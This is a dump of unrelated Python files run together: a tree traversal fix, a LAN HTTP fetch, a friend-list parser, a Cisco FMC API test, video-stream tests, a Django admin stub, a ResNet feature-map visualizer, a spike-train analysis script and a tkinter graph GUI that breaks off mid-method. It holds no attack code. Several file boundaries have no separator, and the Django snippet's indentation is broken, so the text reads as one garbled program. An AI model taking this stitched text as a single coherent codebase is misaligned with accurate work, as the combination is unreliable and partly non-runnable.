    BUG FIX: children were assigned to `.lchild`/`.rchild`, attributes that
    `TreeNode` (and `levelOrder`) never read, so the built tree was always
    empty below the root.  They are now assigned to `.left`/`.right`.
    Also: `== None` comparisons replaced with identity checks.
    """
    if nodeList[0] is None:
        return None
    head = TreeNode(nodeList[0])
    nodes = [head]
    j = 1
    # Walk the nodes in creation order, attaching up to two children each
    # until the value list is exhausted.
    for node in nodes:
        if node is not None:
            node.left = (TreeNode(nodeList[j]) if nodeList[j] is not None else None)
            nodes.append(node.left)
            j += 1
            if j == len(nodeList):
                return head
            node.right = (TreeNode(nodeList[j]) if nodeList[j] is not None else None)
            j += 1
            nodes.append(node.right)
            if j == len(nodeList):
                return head
class Solution:
    def levelOrder(self, root):
        """Return node values level by level, left to right.

        BUG FIX: the original used `queue.pop()`, which removes from the END
        of the list and therefore reversed the order of values within each
        level (and scrambled deeper levels).  A deque with `popleft()`
        restores true breadth-first, left-to-right order.
        """
        from collections import deque  # local import keeps this snippet self-contained
        if root is None:
            return []
        res = []
        queue = deque([root])
        while queue:
            level_list = []
            # Exactly the nodes currently queued form one level.
            for _ in range(len(queue)):
                cur = queue.popleft()
                level_list.append(cur.val)
                if cur.left is not None:
                    queue.append(cur.left)
                if cur.right is not None:
                    queue.append(cur.right)
            res.append(level_list)
        return res
if __name__ == '__main__':
    # Build a small tree from a level-order list and run the traversal.
    values = [1, 1, 3, 4]
    root = creatTree(values)
    traversal = Solution().levelOrder(root)
|
# http testing
import sys
from urllib.request import Request, urlopen
from datetime import datetime
# Fetch one URL and print the body; on failure, log the error with a
# timestamp to stderr.
try:
    url = 'http://192.168.1.11:8080/mysite3/gb/ajax'
    request = Request(url)
    response = urlopen(request)
    response_body = response.read().decode('utf-8')
    print(response_body)
except Exception as e:
    # BUG FIX: datetime.now was passed without parentheses, so the method
    # object (not the current time) was printed.
    print('%s : %s' % (e, datetime.now()), file=sys.stderr)
|
# Maintain a list of friend names, applying Blacklist / Error / Change
# commands read from stdin until "Report", then print summary counts.
friends = input().split(", ")
while True:
    line = input()
    if line == "Report":
        break
    tokens = line.split()
    action = tokens[0]
    if action == "Blacklist":
        name = tokens[1]
        if name in friends:
            friends[friends.index(name)] = "Blacklisted"
            print(f"{name} was blacklisted.")
        else:
            print(f"{name} was not found.")
    elif action == "Error":
        position = int(tokens[1])
        # Only usernames that are neither blacklisted nor already lost
        # can be lost to an error.
        if friends[position] != "Blacklisted" and friends[position] != "Lost":
            name = friends[position]
            print(f"{name} was lost due to an error.")
            friends[position] = "Lost"
    elif action == "Change":
        position = int(tokens[1])
        new_name = tokens[2]
        if 0 <= position < len(friends):
            print(f"{friends[position]} changed his username to {new_name}.")
            friends[position] = new_name
blacklisted = "Blacklisted"
print(f"Blacklisted names: {friends.count(blacklisted)}")
lost = "Lost"
print(f"Lost names: {friends.count(lost)}")
print(" ".join(friends))
class Solution:
    def prefixCount(self, words: list[str], pref: str) -> int:
        """Count how many words start with the prefix `pref`.

        Uses str.startswith, which already handles words shorter than the
        prefix.  Also fixes the annotation: `List` was used without an
        import (NameError at class-creation time); the builtin `list`
        generic works on Python 3.9+.
        """
        return sum(1 for word in words if word.startswith(pref))
import logging
import fmcapi
def test__ip_addresses(fmc):
    """Exercise the FMC NetworkAddresses endpoint and log the results.

    Args:
        fmc: an authenticated fmcapi FMC connection object.

    NOTE(review): no assertions are made, so this "test" only verifies
    that the GET call completes without raising.
    """
    logging.info("Test IPAddresses. This only returns a full list of IP object types.")
    obj1 = fmcapi.NetworkAddresses(fmc=fmc)
    logging.info("IPAddresses -->")
    result = obj1.get()
    logging.info(result)
    logging.info("Test IPAddresses done.\n")
|
import os
import unittest
import sys
import cv2
import numpy
sys.path.insert(0, '..')
from detect import fetch_read_m3u8, extract_frame_from_video_url
class ResponseTestCase(unittest.TestCase):
    """Tests for the m3u8 fetch / frame-extraction helpers.

    NOTE(review): test_fetch_read_m3u8 hits a live CDN URL and
    test_extract_frame_from_video_url reads local sample files, so these
    are environment-dependent integration tests rather than unit tests.
    """
    def test_fetch_read_m3u8(self):
        # Playlist URL and the prefix its segment entries should carry.
        mock_link = "https://cdn-004.whatsupcams.com/hls/hr_novska01.m3u8"
        mock_prefix = "https://cdn-004.whatsupcams.com/hls/"
        response = fetch_read_m3u8(mock_link, mock_prefix)
        print(response)
        # The rewritten playlist must contain prefixed .ts segment URLs.
        self.assertIn(mock_prefix, response)
        self.assertIn(".ts", response)

    def test_extract_frame_from_video_url(self):
        # Extract a frame from a local .ts sample and compare it loosely
        # (decimal=-2 tolerates large per-pixel differences) to a reference.
        mock_link = "samples/hr_novska01-51104.ts"
        response, frame = extract_frame_from_video_url(mock_link)
        sample = cv2.imread("samples/frame_novska.jpg")
        numpy.testing.assert_array_almost_equal(sample, frame,decimal=-2)
# BUG FIX: run the tests only when executed as a script, not on import.
if __name__ == "__main__":
    unittest.main()
|
from django.contrib import admin
# Register your models here.
from snippets.models import CourseUsers
@admin.register(CourseUsers)
class CourseUsersAdmin(admin.ModelAdmin):
list_display = ('id', 'course', 'owner')
|
# BUG FIX: the module is `urllib`, not `urlib` (the original line raised
# ModuleNotFoundError); split into one import per line per PEP 8.
import urllib.request
import urllib.parse
import urllib.error
import curl  # NOTE(review): third-party; pycurl's import name is `pycurl` -- confirm this module exists
import json

# Base URL for the AutoPi cloud API.
api_url='https://api.autopi.io'
|
'''
zhuliwen: liwenzhu@pku.edu.cn
October 24,2019
ref: https://blog.csdn.net/jacke121/article/details/85422244
https://github.com/kvfrans/feature-visualization
'''
import cv2
import numpy as np
import torch
from torch.autograd import Variable
from AI_homework_1 import ResNet, BasicBlock
import os
import matplotlib.pyplot as plt
import torch.nn as nn
def preprocess_image(cv2im, resize_im=True):
    """Convert a BGR OpenCV image into a normalized, batched torch Variable.

    Steps: optional resize to 224x224, BGR->RGB flip, HWC->CHW transpose,
    scale to [0, 1], ImageNet mean/std normalization, then wrap the result
    as a (1, 3, H, W) Variable with gradients enabled.
    """
    mean = [0.485, 0.456, 0.406]
    std = [0.229, 0.224, 0.225]
    # Resize image
    if resize_im:
        cv2im = cv2.resize(cv2im, (224, 224))
    arr = np.float32(cv2im)
    arr = np.ascontiguousarray(arr[..., ::-1])  # BGR -> RGB
    arr = arr.transpose(2, 0, 1)  # Convert array to D,W,H
    # Normalize the channels
    for ch_idx in range(arr.shape[0]):
        arr[ch_idx] /= 255
        arr[ch_idx] -= mean[ch_idx]
        arr[ch_idx] /= std[ch_idx]
    # Convert to float tensor and add a batch dim: shape (1, 3, 224, 224)
    tensor = torch.from_numpy(arr).float()
    tensor.unsqueeze_(0)
    # Convert to Pytorch variable
    return Variable(tensor, requires_grad=True)
class FeatureVisualization():
    """Extract and deconvolve intermediate feature maps of a trained ResNet.

    Args:
        img_path: path of the image to visualize.
        selected_layer: 'conv1' or 'conv5-x' — which stage's output to take.
        model: trained network whose named modules are traversed.
        chan: index of the feature-map channel to extract.
    """

    def __init__(self, img_path, selected_layer, model, chan=0):
        self.img_path = img_path
        self.selected_layer = selected_layer
        # BUG FIX: model.named_modules() returns a one-shot generator; storing
        # it meant it printed as an opaque generator object and would be
        # exhausted after a single traversal. Materialize it once.
        self.pretrained_model = list(model.named_modules())
        self.chan = chan

    def process_image(self):
        """Load the image from disk and preprocess it into a (1, 3, 224, 224) Variable."""
        img = cv2.imread(self.img_path)
        img = preprocess_image(img)
        return img

    def get_feature(self):
        """Run the image through the network up to the selected layer (on GPU)."""
        # input = Variable(torch.randn(1, 3, 224, 224))
        input = self.process_image()
        print(input.shape)
        x = input.cuda()
        if self.selected_layer == 'conv1':
            for index, layer in enumerate(self.pretrained_model):
                if layer[0] in ['conv1.0']:
                    x = layer[1](x)
                    return x
        elif self.selected_layer == 'conv5-x':
            for index, layer in enumerate(self.pretrained_model):
                if layer[0] in ['conv1', 'conv2_x', 'conv3_x', 'conv4_x', 'conv5_x.0']:
                    x = layer[1](x)
                    if (layer[0] == 'conv5_x.0'):
                        return x

    def get_single_feature(self):
        """Return one 2-D channel (self.chan) of the selected layer's output."""
        features = self.get_feature()
        print(features.shape)
        feature = features[:, self.chan, :, :]  # any of the 64 channels can be extracted here
        # feature = features[self.chan, :, :]
        feature = feature.view(feature.shape[1], feature.shape[2])
        print(feature.shape)
        return feature

    def get_deconv_feature(self):
        """Project the selected layer's features back to image space with
        (untrained) transposed convolutions, returning a 2-D map."""
        feature = self.get_feature()
        if self.selected_layer == 'conv1':
            unConv1 = nn.ConvTranspose2d(64, 3, kernel_size=7, padding=3, stride=2, bias=False).cuda()
            deconv_features = unConv1(feature)
            deconv_feature = deconv_features[:, 0, :, :]
            deconv_feature = deconv_feature.view(deconv_feature.shape[1], deconv_feature.shape[2])
            return deconv_feature
        elif self.selected_layer == 'conv5-x':
            # Mirror of the conv5 -> conv1 path; weights are random (visualization only).
            unConv_5 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1, bias=False).cuda()
            unBN_5 = nn.BatchNorm2d(256).cuda()
            unReLU_5 = nn.ReLU(inplace=True).cuda()
            unConv_4 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1, bias=False).cuda()
            unBN_4 = nn.BatchNorm2d(128).cuda()
            unReLU_4 = nn.ReLU(inplace=True).cuda()
            unConv_3 = nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, bias=False).cuda()
            unBN_3 = nn.BatchNorm2d(64).cuda()
            unReLU_3 = nn.ReLU(inplace=True).cuda()
            unConv_2 = nn.ConvTranspose2d(64, 64, kernel_size=3, stride=2, padding=1, bias=False).cuda()
            unBN_2 = nn.BatchNorm2d(64).cuda()
            unReLU_2 = nn.ReLU(inplace=True).cuda()
            unConv1 = nn.ConvTranspose2d(64, 3, kernel_size=7, stride=2, padding=3, bias=False).cuda()
            deconv_features = unConv_5(feature)
            deconv_features = unBN_5(deconv_features)
            deconv_features = unReLU_5(deconv_features)
            deconv_features = unConv_4(deconv_features)
            deconv_features = unBN_4(deconv_features)
            deconv_features = unReLU_4(deconv_features)
            deconv_features = unConv_3(deconv_features)
            deconv_features = unBN_3(deconv_features)
            deconv_features = unReLU_3(deconv_features)
            deconv_features = unConv_2(deconv_features)
            deconv_features = unBN_2(deconv_features)
            deconv_features = unReLU_2(deconv_features)
            deconv_features = unConv1(deconv_features)
            deconv_feature = deconv_features[:, 0, :, :]
            deconv_feature = deconv_feature.view(deconv_feature.shape[1], deconv_feature.shape[2])
            return deconv_feature

    def save_feature_to_img(self, file, ax1):
        """Render the deconvolved feature map onto the given matplotlib axis."""
        feature = self.get_deconv_feature()
        feature = feature.data.cpu().detach().numpy()
        # use sigmoid to map values into [0, 1]
        feature = 1.0 / (1 + np.exp(-1 * feature))
        # then scale to [0, 255]
        feature = np.round(feature * 255)
        print(os.path.splitext(file))
        w_min = np.min(feature)
        w_max = np.max(feature)
        print(feature)
        if self.selected_layer == 'conv1':
            feature = cv2.applyColorMap(np.uint8(feature), cv2.COLORMAP_JET)
        ax1.imshow(feature, vmin=w_min, vmax=w_max,
                   interpolation='nearest')  # 'gist_ncar'
        ax1.set_xticks([])
        ax1.set_yticks([])
if __name__ == '__main__':
    # Build a ResNet-18 (BasicBlock with [2, 2, 2, 2] stages), move it to the
    # GPU and load the trained checkpoint.
    net = ResNet(BasicBlock, [2, 2, 2, 2])
    net = net.cuda()
    net.load_state_dict(torch.load('resnet18-25-best.pth'))
    # Pass 1: for every raw image in ./img_fmap, plot an 8x8 grid of conv1
    # deconvolved channels (one FeatureVisualization per channel index).
    for file in os.listdir('./img_fmap'):
        if 'after' not in file:  # skip previously generated output images
            # for layer in ['conv1', 'conv5-x']:
            for layer in ['conv1']:
                fig, axes = plt.subplots(8, 8, figsize=(10, 10))
                for i, ax1 in enumerate(axes.flat):
                    myClass1 = FeatureVisualization('./img_fmap/'+ file, layer, net, chan=i)  # conv1 or conv5-x
                    print(myClass1.pretrained_model)
                    myClass1.save_feature_to_img('./img_fmap/'+ file, ax1)
                plt.show()
                fig.savefig('{}_{}_after_Deconv1.jpg'.format('./img_fmap/'+ os.path.splitext(file)[0], layer), bbox_inches = 'tight')
    # Pass 2: same images, single-channel conv5-x deconvolution on one axis.
    for file in os.listdir('./img_fmap'):
        if 'after' not in file:
            for layer in ['conv5-x']:
                fig, ax1 = plt.subplots()
                myClass1 = FeatureVisualization('./img_fmap/'+ file, layer, net, chan=0)  # conv1 or conv5-x
                print(myClass1.pretrained_model)
                myClass1.save_feature_to_img('./img_fmap/'+ file, ax1)
                fig.savefig('{}_{}_after_Deconv5.jpg'.format('./img_fmap/' + os.path.splitext(file)[0], layer),
                            bbox_inches='tight')
# -*- coding: utf-8 -*-
"""
Spike-train analysis around sound events using the local `ephys` module:
rasters, binned/continuous PSTHs and population heatmaps.

Created on Tue Aug 17 16:34:14 2021
@author: kkondrakiewicz
"""
#%% Imports
import sys
# Add directory with ephys module
sys.path.append(r'C:\Users\kkondrakiewicz\Documents\Python Scripts\EphysAnalysis')
import ephys as ep
import numpy as np
import matplotlib.pyplot as plt
#%% Set parameters
spks_dir = "D:\\buffering_np\\NP2_test\\"  # directory with spikes (Phy output)
sounds = np.loadtxt("D:\\buffering_np\\NP2_test\\TTL_gcat\\TTL_3.txt")  # txt file with event timestamps
save_dir = 'C:\\Users\\kkondrakiewicz\\Desktop\\ploty\\'  # where to save plots
# window size for analysis (in seconds)
pre_event = 2.0
post_event = 5.0
bin_size = 0.250
# Read spikes from good units; in real life set also sampling_rate parameter to the one from Neuropixels .meta file
spikes_ts, units_id = ep.read_spikes(spks_dir, read_only = 'good')
# Center spikes on events (within a selected time window, for each trial)
centered_ts = ep.calc_rasters(spikes_ts, sounds, pre_event, post_event)
# Based on the centered data, plot rasters for all neurons
fig, axes = ep.plot_rasters(centered_ts)
fig.suptitle('Single neurons - responses to events')
# Now calculate also firing rate for each time bin and each trial
all_fr, mean_fr, sem_fr, bin_edges = ep.fr_events(centered_ts, bin_size, pre_event, post_event)
# And also normalize the firing rate to individual baselines (pre-event period during each trial)
all_zsc, mean_zsc, sem_zsc, bin_edges = ep.zscore_events(all_fr, bin_size, pre_event, post_event)
# Now you can plot the PSTH: mean firing rate (normalized or not) together with SEM, for all neurons
fig, axes = ep.plot_psth(mean_zsc, sem_zsc, bin_edges[1:])
fig.suptitle('Single neurons - mean responses to events')
# Or combine the raster and PSTH on a separate plot: this we don't want to display for all neurons, so instead save it
ep.plot_responses(centered_ts, mean_fr, sem_fr, bin_edges[1:], save_dir)
#%% Plot responses of all neurons using one heatmap
import seaborn as sns
# Rows sorted by the z-score in bin 8 (presumably a just-post-event bin — verify)
sns.heatmap(mean_zsc[mean_zsc[:,8].argsort()], xticklabels=bin_edges[1:])
#%% Continuous (binless) firing-rate estimate around events
all_cont, mean_cont, sem_cont, t_vec = ep.fr_events_binless(centered_ts, 0.1, 4, 30000.0, 1000, pre_event, post_event)
#%% Save combined raster + continuous PSTH figures per neuron
#ep.plot_psth(mean_cont, sem_cont, t_vec)
ep.plot_responses(centered_ts, mean_cont, sem_cont, t_vec, 'C:\\Users\\kkondrakiewicz\\Desktop\\ploty2\\')
#%% Plot responses of all neurons using one heatmap
plt.figure()
# Sort neurons by their mean rate in the first 500 ms after the event,
# then downsample columns 10x for display.
sortby = np.mean(mean_cont[:, int(1000*pre_event) : int(1000*pre_event+500)], 1).argsort()
sns.heatmap(mean_cont[sortby,0::10])
import queue
import tkinter as tk
import webbrowser
from subprocess import Popen
from thread import ThreadedTask
from tkinter import messagebox
from tkinter.colorchooser import *
from tkinter.filedialog import askopenfilename, asksaveasfile
from tkinter.ttk import *
import matplotlib.pyplot as plt
import pandas as pd
import pyperclip
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from pandastable import Table, TableModel
from tkcalendar import DateEntry
import ListBox as lb
from pdf import ReportGen
class GUI():
    """
    GUI class creates GUI for a passed tkinter object and a data program.
    This class uses ThreadedTask class for parallel processing of results.
    Args: prog: data program instance window: tkinter root instance
    """

    def __init__(self, prog, window):
        """Store the data program and root window; initialize shared state."""
        self.gexffile = ""          # path of the last generated/opened .gexf file
        self.frame_w = 480
        self.frame_h = 315
        self.prog = prog
        self.window = window
        self.statusTxt = tk.StringVar()
        self.report = None          # ReportGen instance, created in frame4
        self.statusTxt.set("STATUS")

    def msg(self, val):
        """Display an error message box for a missing input named *val*."""
        messagebox.showerror("EMPTY", "INPUT VALUE "+val)
        self.window.config(cursor="arrow")

    def grid_config(self, frame):
        """Give every grid row/column of *frame* a minimum size of 20px."""
        col_count, row_count = frame.grid_size()
        for col in range(col_count):
            frame.grid_columnconfigure(col, minsize=20)
        for row in range(row_count):
            frame.grid_rowconfigure(row, minsize=20)

    def frame1(self, nb):
        """Build and return the DOWNLOAD tab (link entry, preview table, save)."""
        f1 = Frame(nb, width=self.frame_w, height=self.frame_h/2)
        f1.grid_propagate(0)  # Resets auto grid shrink and growth
        # Table frame inside f1
        ft = Frame(f1, width=self.frame_w, height=self.frame_h/2)
        ft.pack(side=tk.BOTTOM)
        df = pd.DataFrame()  # Blank dataframe
        pt = Table(ft, dataframe=df, rows=5, height=100, width=400)
        Label(f1, text="INPUT LINK").grid(column=2, row=2, sticky='w')
        linkTxt = tk.StringVar()
        link = Entry(f1, width=50, textvariable=linkTxt)
        link.focus()
        linkTxt.set("")
        link.grid(column=4, row=2)
        # DOWNLOAD button start
        btn_down = Button(f1, text="DOWNLOAD")

        # Nested function for downloading dataframe using queue
        def process_queue_dldf():
            try:
                df = self.queue.get(0)
                if df is not None:
                    pt.updateModel(TableModel(df))
                    pt.show()
                    pt.redraw()
                    self.set_status("DOWNLOADED!")
                    self.window.config(cursor="arrow")
            except queue.Empty:
                self.window.after(100, process_queue_dldf)

        # Nested click function for DOWNLOAD button
        def click_down():
            if not linkTxt.get():
                self.msg("LINK")
                return
            self.window.config(cursor="wait")
            # download db using ThreadedTask class, on complete: continue
            self.set_status("DOWNLOADING!")
            self.queue = queue.Queue()
            ThreadedTask(self.queue, self.prog, "dldf", linkTxt.get()).start()
            # BUG FIX: the original code assigned the after() callback id to
            # `df`, clobbering the DataFrame reference that click_save checks.
            self.window.after(100, process_queue_dldf)
        btn_down.configure(command=click_down)
        btn_down.grid(column=2, row=5, sticky='sw')
        # DOWNLOAD button end
        # SAVE button start
        btn_save = Button(f1, text="SAVE")

        # Nested function for saving dataframe as csv using queue
        def process_queue_scsv():
            try:
                msg = self.queue.get(0)
                if msg is not None:
                    self.set_status("FILE SAVED AT "+msg.name)
                    self.window.config(cursor="arrow")
            except queue.Empty:
                self.window.after(100, process_queue_scsv)

        # Nested click function for SAVE button
        def click_save():
            if df is not None:
                files = [('Comma Separated Values', '*.csv')]
                save_file = asksaveasfile(
                    filetypes=files, defaultextension=files)
                if not save_file:
                    return
                # save dataframe using ThreadedTask class, on complete: continue
                self.queue = queue.Queue()
                ThreadedTask(self.queue, self.prog, "scsv", save_file).start()
                self.window.after(100, process_queue_scsv)
        btn_save.configure(command=click_save)
        btn_save.grid(column=4, row=5, sticky='se')
        # SAVE button end
        self.grid_config(f1)
        return f1

    def frame2(self, nb):
        """Build and return the SELECT tab (graph/color choice, date range, generate)."""
        f2 = Frame(nb, width=self.frame_w, height=self.frame_h)
        f2.grid_propagate(0)  # Resets grid shrink and growth auto
        Label(f2, text="SELECT GRAPH TYPE:").grid(column=2, row=2, sticky='w')
        graph_field = self.prog.get_graph_field()
        graph_type = tk.StringVar(f2)
        graph_type.set(graph_field[0])
        option = OptionMenu(f2, graph_type, *graph_field)
        option.config(width=40)
        option.grid(column=3, row=2)
        Label(f2, text="SELECT COLOR FIELD:").grid(column=2, row=3, sticky='w')
        color_field = self.prog.get_color_field()
        color_type = tk.StringVar(f2)
        color_type.set(color_field[0])
        optionc = OptionMenu(f2, color_type, *color_field)
        optionc.config(width=40)
        optionc.grid(column=3, row=3)
        colordict = tk.StringVar()

        # Trace callback: whenever the color field changes, pop up a dialog
        # where the user maps each unique field value to a chosen color.
        def change_color(var, indx, mode):
            col_dict = {}
            clrsc = tk.Toplevel(self.window)
            clrsc.geometry('300x300')
            clrsc.transient()
            clrsc.focus_set()
            clrsc.title('CHOOSE COLOR')
            col_list = tk.Listbox(
                clrsc, height=5, width=40, selectmode=tk.SINGLE)
            col_list.insert(
                tk.END, *self.prog.get_unique_val(color_type.get()))

            def onselect(evt):
                w = evt.widget
                index = int(w.curselection()[0])
                value = w.get(index)
                rgb, color = askcolor(
                    parent=clrsc, title='Choose {} color'.format(value))
                col_dict[value] = color
            col_list.bind('<<ListboxSelect>>', onselect)
            col_list.config(width=35)
            col_list.pack()
            # SELECT button start
            btn_sel = Button(clrsc, text="SELECT")

            # Nested function for sel button save choices
            def click_sel():
                clrsc.destroy()
            btn_sel.configure(command=click_sel)
            btn_sel.pack()
            # SELECT button end
            # RETURN button start
            btn_ret = Button(clrsc, text="DON'T SELECT")

            # Nested function for ret button
            def click_ret():
                clrsc.destroy()
                colordict.set('0')
            btn_ret.configure(command=click_ret)
            btn_ret.pack()
            self.window.wait_window(clrsc)
            # '0' signals "no custom colors"; otherwise the dict is stored as
            # its string representation inside the StringVar.
            if not bool(col_dict) or None in col_dict.values():
                colordict.set('0')
            else:
                colordict.set(col_dict)
        color_type.trace_add('write', change_color)
        # OPEN button start
        btn_open = Button(f2, text="OPEN")

        # Nested open function for open button
        def click_open():
            files = [('Comma Separated Values', '*.csv')]
            open_filename = askopenfilename(filetypes=files)
            if open_filename:
                self.prog.open_file(open_filename, 0)
                click_ref()
                self.set_status("FILE OPENED "+open_filename)
        btn_open.configure(command=click_open)
        btn_open.grid(column=2, row=1, sticky='wn')
        # OPEN button end
        Label(f2, text="SELECT DATE RANGE:").grid(column=2, row=4, sticky='w')
        # get start and end date in row 5 (disabled until a file is loaded)
        calstart = DateEntry(f2, date_pattern="y-mm-dd", state=tk.DISABLED)
        calstart.grid(column=2, row=5, sticky='w')
        calend = DateEntry(f2, date_pattern="y-mm-dd", state=tk.DISABLED)
        calend.grid(column=3, row=5, sticky='e')
        # GENERATE button start
        btn_gen = Button(f2, text="GENERATE")

        # Nested function for saving nx graph as gexf using queue
        def process_queue_sgexf():
            try:
                save_file = self.queue.get(0)
                if save_file is not None:
                    self.set_status("FILE SAVED AT "+save_file)
                    self.window.config(cursor="arrow")
            except queue.Empty:
                self.window.after(100, process_queue_sgexf)

        # Nested function for generating nx graph using queue
        def process_queue_gengf():
            try:
                colord = self.queue.get(0)
                if type(colord) is dict:
                    color = ""
                    Label(f2, text="COLORING DETAILS").grid(
                        column=2, row=11, sticky='nws')
                    info = tk.Text(f2, height=5, width=30)
                    info.configure(state=tk.NORMAL)
                    real = 1
                    # Show each value's name tinted with its assigned color.
                    for k in colord.keys():
                        l = len(str(k))
                        color = str(k)+"\n"
                        c = [e for e in colord.get(k).values()]
                        c.pop()
                        c = '#{:02x}{:02x}{:02x}'.format(*c)
                        info.insert(tk.END, color)
                        info.tag_add(k, str(real)+".0",
                                     str(real)+"."+str(l))
                        info.tag_configure(
                            k, foreground=c, font=("Helvetica", 12, "bold"))
                        real += 1
                    info.configure(state=tk.DISABLED)
                    info.grid(column=3, row=11, sticky='nw')
                    self.set_status("GRAPH GENERATED!")
                    self.window.config(cursor="arrow")
                    files = [('Graph Exchange XML Format', '*.gexf')]
                    save_file = asksaveasfile(
                        filetypes=files, defaultextension=files)
                    if not save_file:
                        return
                    self.window.config(cursor="wait")
                    self.gexffile = save_file.name
                    # save nx graph using ThreadedTask class, on complete: continue
                    self.queue = queue.Queue()
                    ThreadedTask(self.queue, self.prog,
                                 "sgexf", self.gexffile).start()
                    self.window.after(100, process_queue_sgexf)
            except queue.Empty:
                self.window.after(100, process_queue_gengf)

        # Nested click function for GENERATE button
        def click_gen():
            if graph_type.get() == "SELECT":
                self.msg("GRAPH TYPE")
                return
            elif color_type.get() == "SELECT":
                self.msg("COLOR TYPE")
                return
            self.window.config(cursor="wait")
            # generate nx graph using ThreadedTask class, on complete: continue
            self.queue = queue.Queue()
            ThreadedTask(self.queue, self.prog, "gengf",
                         graph_type.get(), color_type.get(), calstart.get_date(), calend.get_date(), colordict.get()).start()
            self.window.after(100, process_queue_gengf)
        btn_gen.configure(command=click_gen)
        btn_gen.grid(column=3, row=7, sticky='se')
        # GENERATE button end
        # REFRESH button start
        btn_ref = Button(f2, text="REFRESH")

        # Nested refresh function for ref button: re-reads fields and date
        # range from the program and rebuilds both option menus.
        def click_ref():
            graph_field = self.prog.get_graph_field()
            start, end = self.prog.get_daterange()
            calstart.config(state=tk.NORMAL, mindate=start, maxdate=end)
            calend.config(state=tk.NORMAL, mindate=start, maxdate=end)
            option['menu'].delete(0, 'end')
            graph_type.set(graph_field[0])
            for choice in graph_field:
                option['menu'].add_command(
                    label=choice, command=tk._setit(graph_type, choice))
            color_field = self.prog.get_color_field()
            optionc['menu'].delete(0, 'end')
            color_type.set(color_field[0])
            for choice in color_field:
                optionc['menu'].add_command(
                    label=choice, command=tk._setit(color_type, choice))
            self.set_status("REFRESHED!")
            self.window.config(cursor="arrow")
        btn_ref.configure(command=click_ref)
        btn_ref.grid(column=2, row=7, sticky='ws')
        # REFRESH button end
        self.grid_config(f2)
        return f2

    def frame3(self, nb):
        """Build and return the DISPLAY tab (graph info, open gexf, launch Gephi)."""
        f3 = Frame(nb, width=self.frame_w, height=self.frame_h)
        f3.grid_propagate(0)  # Resets grid shrink and growth auto
        Label(f3, text="GRAPH DETAILS").grid(column=2, row=2, sticky='w')
        info = tk.Text(f3, height=5, width=40)
        info.insert(tk.END, self.prog.get_info())
        info.configure(state=tk.DISABLED)
        info.grid(column=2, row=3, sticky='nw')
        # GEPHI button start
        btn_gephi = Button(f3, text="LAUNCH GEPHI")

        # Nested click function for gephi launch
        def click_gephi():
            self.window.config(cursor="wait")
            # run GEPHI via the file association (Windows-specific 'cmd /c')
            cmd = 'cmd /c ' + self.gexffile
            Popen(cmd, shell=False)
            self.window.config(cursor="arrow")
        btn_gephi.configure(command=click_gephi)
        btn_gephi.grid(column=2, row=6, sticky='se')
        # GEPHI button end
        # REFRESH button start
        btn_ref = Button(f3, text="REFRESH")

        # Nested refresh function for ref button
        def click_ref():
            info.configure(state=tk.NORMAL)
            info.delete('1.0', tk.END)
            info.insert(tk.END, self.prog.get_info())
            info.configure(state=tk.DISABLED)
            self.set_status("REFRESHED!")
            self.window.config(cursor="arrow")
        btn_ref.configure(command=click_ref)
        btn_ref.grid(column=2, row=6, sticky='ws')
        # REFRESH button end
        # OPEN button start
        btn_open = Button(f3, text="OPEN")

        # Nested refresh function for open button
        def click_open():
            files = [('Graph Exchange XML Format', '*.gexf')]
            open_filename = askopenfilename(filetypes=files)
            if open_filename:
                infotxt = self.prog.open_file(open_filename, 1)
                self.gexffile = open_filename
                info.configure(state=tk.NORMAL)
                info.delete('1.0', tk.END)
                info.insert(tk.END, infotxt)
                info.configure(state=tk.DISABLED)
                self.set_status("FILE OPENED "+open_filename)
        btn_open.configure(command=click_open)
        btn_open.grid(column=2, row=1, sticky='wn')
        # OPEN button end
        self.grid_config(f3)
        return f3

    def showmatgraph(self, df, graph_type, legend, subplots, stacked):
        """Render a matplotlib chart of *df* in a separate dialog; double-click
        saves the current report as PDF."""
        plotsc = tk.Toplevel(self.window)
        plotsc.geometry('600x600')
        plotsc.transient()
        plotsc.focus_set()
        plotsc.title('STATIC GRAPH')
        figure = plt.Figure(figsize=(6, 6), dpi=100)
        ax = figure.add_subplot(111)
        chart_type = FigureCanvasTkAgg(figure, plotsc)
        chart_type.get_tk_widget().pack()
        ax.set_title(graph_type)
        graph_col = list(df.columns.values)
        fig = None
        if graph_type == 'bar' or graph_type == 'barh':
            fig = df.groupby(graph_col).size().unstack(fill_value=0).plot(
                kind=graph_type, rot=45, legend=legend, stacked=stacked, ax=ax, subplots=subplots)
        elif graph_type == 'line':
            fig = df.groupby([graph_col[0], graph_col[1]]).size().unstack(fill_value=0).plot(
                kind='line', rot=45, legend=legend, stacked=stacked, ax=ax, subplots=subplots)
        elif graph_type == 'pie':
            fig = df.groupby(graph_col)[graph_col].count().plot(
                kind='pie', rot=45, legend=legend, stacked=False, ax=ax, subplots=True)
        if subplots:
            fig = fig[0]  # plot(...) returns an array of axes when subplots=True
        self.report.set_image(fig.get_figure())

        def save_graph(event):
            files = [('Portable Document Format', '*.pdf')]
            save_file = asksaveasfile(filetypes=files, defaultextension=files)
            if save_file:
                self.report.gen_report(save_file.name)
                self.set_status("FILE SAVED AT "+save_file.name)
        plotsc.bind('<Double-Button-1>', save_graph)
        self.window.config(cursor="arrow")

    def frame4(self, nb):
        """Build and return the STATIC GRAPH tab (chart type/columns/options)."""
        f4 = Frame(nb, width=self.frame_w, height=self.frame_h)
        f4.grid_propagate(0)  # Resets grid shrink and growth auto
        # OPEN button start
        btn_open = Button(f4, text="OPEN")

        # Nested refresh function for open button
        def click_open():
            files = [('Comma Separated Values', '*.csv')]
            open_filename = askopenfilename(filetypes=files)
            if open_filename:
                collist = self.prog.open_file(open_filename, 0)
                col_list.delete(0, tk.END)
                col_list.insert(tk.END, *collist)
                self.set_status("FILE OPENED "+open_filename)
        btn_open.configure(command=click_open)
        btn_open.grid(column=2, row=1, sticky='wn')
        # OPEN button end
        Label(f4, text="SELECT GRAPH TYPE:").grid(column=2, row=2, sticky='w')
        graph_field = ['SELECT', 'line', 'pie', 'bar', 'barh']
        graph_type = tk.StringVar(f4)
        graph_type.set(graph_field[0])
        option = OptionMenu(f4, graph_type, *graph_field)
        option.config(width=35)
        option.grid(column=2, row=3, sticky='s')
        graph_field_select_mode = tk.EXTENDED
        Label(f4, text="SELECT GRAPH COLUMNS:").grid(
            column=2, row=4, sticky='w')
